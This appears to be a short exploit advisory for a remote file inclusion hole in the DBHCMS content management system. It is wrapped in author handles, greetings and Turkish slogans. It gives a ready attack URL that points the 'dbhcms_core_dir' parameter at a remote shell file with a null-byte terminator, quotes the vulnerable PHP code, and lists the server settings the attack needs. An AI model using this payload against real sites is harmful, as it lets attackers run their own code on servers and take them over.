############################################################# # DBHCMS - Web Content Management System RFI Vulnerability http://www.drbenhur.com/ # Author: Gamoscu # Site: www.1923turk.biz https://gamoscu.wordpress.com/ Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO Hosgeldin medine bebek Allah anali babali buyutsun pasam ############################################################## # Exploit: Vuln file: index.php Exploit: target: ?dbhcms_core_dir=http://site.com/shell.txt%00 / * Need register_globals = ON and allow_url_include = ON without a second yuzaetsya as LFI * / index.php function dbhcms_init($core) { $init = $core.'init.php'; $page = $core.'page.php'; if ((is_file($init))&&(is_file($page))) { require_once($init); require_once($page); } else { die('
FATAL ERROR - Could not find the initialzation files. Please check the "$dbhcms_core_dir" parameter in the "config.php" and make shure the directory is correct.
'); } } ...... dbhcms_init($GLOBALS['dbhcms_core_dir']); Vatan Lafla Degil Eylemle Sevilir Kiskananlar catlasin Zorunuza Gitmesin